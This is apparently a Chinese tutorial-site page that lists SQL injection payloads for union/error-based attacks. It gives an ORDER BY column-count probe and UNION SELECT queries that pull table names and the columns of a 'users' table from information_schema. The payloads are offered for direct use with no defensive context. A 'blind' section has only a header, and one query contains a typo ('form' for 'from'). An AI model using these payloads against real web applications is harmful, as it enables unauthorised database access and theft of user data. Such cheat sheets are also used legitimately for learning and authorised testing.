1. 技术文章
  2. sql注入之payload

sql注入之payload

你说的曾经没有我的故事 提交于 2019-12-03 08:18:29

/*
*GET,post
*有返回
*
*/
基于报错的SQL注入
1、获取字段数
' order by 5 --+
2、获取表名
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
select group_concat(table_name) from information_schema.tables where table_schema=database()
3、获取字段
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
select group_concat(column_name) form information_schema.columns where table_name='users'
/*
*GET,post
*无返回,无报错,
*
*/

标签
payload
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!